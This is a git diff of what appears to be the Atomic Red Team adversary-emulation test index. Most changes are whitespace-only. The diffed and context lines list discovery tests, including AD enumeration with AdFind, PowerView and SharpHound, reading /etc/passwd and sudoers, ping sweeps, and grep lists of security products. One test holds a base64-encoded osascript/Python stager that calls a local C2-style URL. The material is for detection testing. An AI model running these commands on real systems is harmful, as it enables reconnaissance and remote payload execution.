auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | @@ -54192,10 +54192,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -54285,7 +54285,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * - ' +' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -54298,17 +54298,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk - ' +' prereq_command: 'WHERE nltest.exe >NUL 2>&1 - ' +' get_prereq_command: 'echo Sorry RSAT must be installed manually - ' +' executor: command: 'nltest /domain_trusts - ' +' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -54321,26 +54321,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk - ' +' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" - ' +' - description: 'RSAT PowerShell AD admin cmdlets must be installed - ' +' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" - ' +' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" @@ -54365,14 +54365,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -54392,14 +54392,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -54409,7 +54409,7 @@ discovery: Upon execution, progress and info about trusts within the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54423,7 +54423,7 @@ discovery: Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54561,7 +54561,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. - ' +' supported_platforms: - windows executor: @@ -54600,13 +54600,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system - ' +' supported_platforms: - macos - linux @@ -54712,7 +54712,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file - ' +' supported_platforms: - linux input_arguments: @@ -54726,7 +54726,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -54745,14 +54745,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 - ' +' supported_platforms: - linux - macos @@ -54767,26 +54767,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user - ' +' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username - ' +' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely - ' +' supported_platforms: - linux input_arguments: @@ -54798,27 +54798,27 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get install login; exit 1; - ' +' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups - ' +' supported_platforms: - linux - macos @@ -54831,7 +54831,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups - ' +' supported_platforms: - macos executor: @@ -54862,7 +54862,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -54882,13 +54882,13 @@ discovery: description: 'Enumerate logged on users. Upon execution, logged on users will be displayed. - ' +' supported_platforms: - windows executor: command: 'query user - ' +' name: command_prompt T1069.001: technique: @@ -54932,7 +54932,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery - ' +' supported_platforms: - macos - linux @@ -54974,7 +54974,7 @@ discovery: description: 'This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR) - ' +' supported_platforms: - windows input_arguments: @@ -54998,11 +54998,11 @@ discovery: prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" - ' +' executor: name: powershell elevation_required: false @@ -55011,19 +55011,19 @@ discovery: & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore - ' +' - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. - ' +' supported_platforms: - windows executor: command: 'wmic.exe group get name - ' +' name: powershell - name: WMIObject Group Discovery auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13 @@ -55031,13 +55031,13 @@ discovery: groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system. - ' +' supported_platforms: - windows executor: command: 'Get-WMIObject Win32_Group - ' +' name: powershell T1046: technique: @@ -55133,11 +55133,11 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" executor: @@ -55164,7 +55164,7 @@ discovery: dependencies: - description: 'NMap must be installed - ' +' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -55177,7 +55177,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python - ' +' supported_platforms: - windows input_arguments: @@ -55193,17 +55193,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' executor: command: 'python #{filename} -i #{host_ip} - ' +' name: powershell T1135: technique: @@ -55267,7 +55267,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery - ' +' supported_platforms: - macos input_arguments: @@ -55285,7 +55285,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus - ' +' supported_platforms: - linux input_arguments: @@ -55302,16 +55302,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares - ' +' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -55329,7 +55329,7 @@ discovery: executor: command: 'net view \\#{computer_name} - ' +' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -55341,7 +55341,7 @@ discovery: executor: command: 'get-smbshare - ' +' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae @@ -55353,28 +55353,28 @@ discovery: executor: command: 'net share - ' +' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain - ' +' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: '"Join system to domain" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -55399,7 +55399,7 @@ discovery: get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 - ' +' executor: command: | Import-Module $env:TEMP\PowerView.ps1 @@ -55476,11 +55476,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55506,11 +55506,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55553,14 +55553,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -55568,7 +55568,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -55641,57 +55641,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. - ' +' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v7 - ' +' executor: command: 'cat /etc/security/pwquality.conf - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v6 - ' +' executor: command: | cat /etc/pam.d/system-auth @@ -55701,43 +55701,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. - ' +' supported_platforms: - linux executor: command: 'cat /etc/login.defs - ' +' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts - ' +' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts /domain - ' +' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. - ' +' supported_platforms: - macos executor: @@ -55916,7 +55916,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -55928,7 +55928,7 @@ discovery: executor: command: 'tasklist - ' +' name: command_prompt T1012: technique: @@ -56096,7 +56096,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain - ' +' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -56114,7 +56114,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} - ' +' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 @@ -56127,7 +56127,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i - ' +' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -56138,7 +56138,7 @@ discovery: executor: command: 'arp -a - ' +' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -56153,17 +56153,17 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" executor: command: 'arp -a | grep -v ''^?'' - ' +' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -56191,7 +56191,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done - ' +' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f @@ -56236,35 +56236,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'adidnsdump must be installed and part of PATH - ' +' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} - ' +' get_prereq_command: 'pip3 install adidnsdump - ' +' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} - ' +' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects @@ -56283,14 +56283,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -56310,14 +56310,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt @@ -56331,17 +56331,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip neighbour show - ' +' name: sh - name: Remote System Discovery - ip route auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 @@ -56353,17 +56353,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip route show - ' +' name: sh - name: Remote System Discovery - ip tcp_metrics auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388 @@ -56375,17 +56375,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip tcp_metrics show |grep --invert-match "^127\." - ' +' name: sh T1518.001: technique: @@ -56487,7 +56487,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' - ' +' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -56499,7 +56499,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' - ' +' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -56512,7 +56512,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 - ' +' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI @@ -56589,7 +56589,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion - ' +' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b @@ -56609,7 +56609,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors - ' +' supported_platforms: - macos executor: @@ -56718,7 +56718,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -56728,7 +56728,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -56745,7 +56745,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -56755,7 +56755,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -56838,7 +56838,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. - ' +' supported_platforms: - windows executor: @@ -56850,7 +56850,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info - ' +' supported_platforms: - macos executor: @@ -56862,7 +56862,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info - ' +' supported_platforms: - linux - macos @@ -56879,14 +56879,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null - ' +' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor: @@ -56905,7 +56905,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor: @@ -56921,40 +56921,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. - ' +' supported_platforms: - windows executor: command: 'hostname - ' +' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. - ' +' supported_platforms: - linux - macos executor: command: 'hostname - ' +' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. - ' +' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid - ' +' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 @@ -56979,27 +56979,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - windows executor: command: 'set - ' +' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - macos - linux executor: command: 'env - ' +' name: sh T1614: technique: @@ -57146,7 +57146,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all - ' +' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -57161,11 +57161,11 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" executor: @@ -57217,10 +57217,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist - ' +' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -57239,7 +57239,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" - ' +' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee @@ -57257,14 +57257,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -57393,7 +57393,7 @@ discovery: executor: command: 'Get-NetTCPConnection - ' +' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -57408,14 +57408,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; - ' +' executor: command: | netstat @@ -57449,10 +57449,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) - ' +' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -57631,10 +57631,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' name: command_prompt T1124: technique: @@ -57701,7 +57701,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -57719,13 +57719,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. - ' +' supported_platforms: - windows executor: command: 'Get-Date - ' +' name: powershell - name: System Time Discovery in macOS auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f @@ -57736,7 +57736,7 @@ discovery: executor: command: 'date - ' +' name: sh T1497.003: technique: @@ -59368,11 +59368,11 @@ resource-development: dependencies: - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable} - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force @@ -59383,7 +59383,7 @@ resource-development: cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1608.001: @@ -61370,7 +61370,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==''));\\\" | python &\"" - ' +' name: sh T1053.001: technique: @@ -61427,7 +61427,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: @@ -61443,30 +61443,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the 